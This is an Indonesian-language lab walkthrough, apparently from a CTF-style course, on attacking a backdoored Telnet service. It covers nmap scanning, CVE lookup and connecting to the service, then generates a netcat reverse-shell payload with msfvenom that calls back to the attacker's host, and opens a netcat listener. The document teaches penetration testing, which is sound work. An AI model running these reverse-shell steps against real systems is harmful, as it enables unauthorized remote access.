Exploiting Telnet

Enumeration Telnet

Kita telah melihat bagaimana enumerasi kunci dapat digunakan untuk mengeksploitasi layanan jaringan yang dikonfigurasikan secara salah. Namun, kerentanan yang mungkin mudah dieksploitasi tidak selalu terlihat oleh kita. Oleh karena itu, terutama dalam hal enumerasi layanan jaringan, kita perlu teliti dalam metode kita.


Port Scanning

Langkah pertama enumerasi adalah melakukan pemindaian port, untuk mengetahui sebanyak mungkin informasi tentang layanan, aplikasi, struktur, dan sistem operasi mesin target.
contoh Commandnmap -p- 10.10.10.10 -open


Telnet

Telnet, sebagai sebuah protokol, pada dasarnya tidak aman karena alasan yang telah kita bahas sebelumnya. Telnet tidak memiliki enkripsi, sehingga mengirimkan semua komunikasi melalui teks biasa, dan sebagian besar memiliki kontrol akses yang buruk. Akan tetapi, ada CVE untuk sistem klien dan server Telnet, jadi saat mengeksploitasinya, Anda dapat memeriksanya di:
- https://www.cvedetails.com/
- https://cve.mitre.org/
CVE , kependekan dari Common Vulnerabilities and Exposures, adalah daftar kelemahan keamanan komputer yang diungkapkan ke publik. Ketika seseorang merujuk ke CVE , yang mereka maksud biasanya adalah nomor ID CVE yang ditetapkan untuk kelemahan keamanan.
Namun, kemungkinan besar Anda akan menemukan kesalahan konfigurasi pada cara telnet dikonfigurasikan atau dioperasikan yang memungkinkan Anda mengeksploitasinya.
Rincian Metode
Jadi, dari tahap enumerasi kita, kita tahu:
- Ada layanan telnet yang tersembunyi dengan buruk yang berjalan di mesin ini
- Layanan itu sendiri ditandai "backdoor"
- Kami memiliki kemungkinan nama pengguna "Skidy" yang terlibat
Dengan menggunakan informasi ini, mari kita coba mengakses port telnet ini, dan menggunakannya sebagai pijakan untuk mendapatkan reverse shell penuh pada mesin tersebut!


Apa itu Reverse Shell?

"Shell" dapat secara sederhana dijelaskan sebagai sepotong kode atau program yang dapat digunakan untuk mengeksekusi kode atau perintah pada suatu perangkat. Shell terbalik adalah jenis shell di mana mesin target berkomunikasi kembali ke mesin penyerang. Mesin penyerang memiliki port pendengaran, yang menerima koneksi, sehingga kode atau perintah dapat dieksekusi.


Menghubungkan ke Telnet

Anda dapat terhubung ke server telnet dengan sintaks berikut:
telnet [ip] [port]
New TAB
Mulai pendengar tcpdump pada mesin lokal Anda.
sudo tcpdump ip proto \\icmp -i tun0
Lakukan Ping dari Telnet ke Local kita untuk mengetes koneksi
ping [ip lokal kita] -c 1
Kita akan membuat muatan reverse shell menggunakan msfvenom. Ini akan membuat dan mengodekan reverse shell netcat untuk kita. Berikut sintaksnya:
msfvenom -p cmd/unix/reverse_netcat lhost=[ip tun0 lokal] lport=4444 R
-p Payloads
lhost alamat IP host lokal kami (ini adalah alamat IP mesin Anda )
lport port untuk mendengarkan (ini adalah port pada mesin Anda )
R export the payload in raw format
Sekarang yang perlu kita lakukan adalah memulai listener netcat di komputer lokal kita. Kita melakukannya dengan menggunakan:
nc -lvp [port]
contoh Commandnc -lvp 4444

tags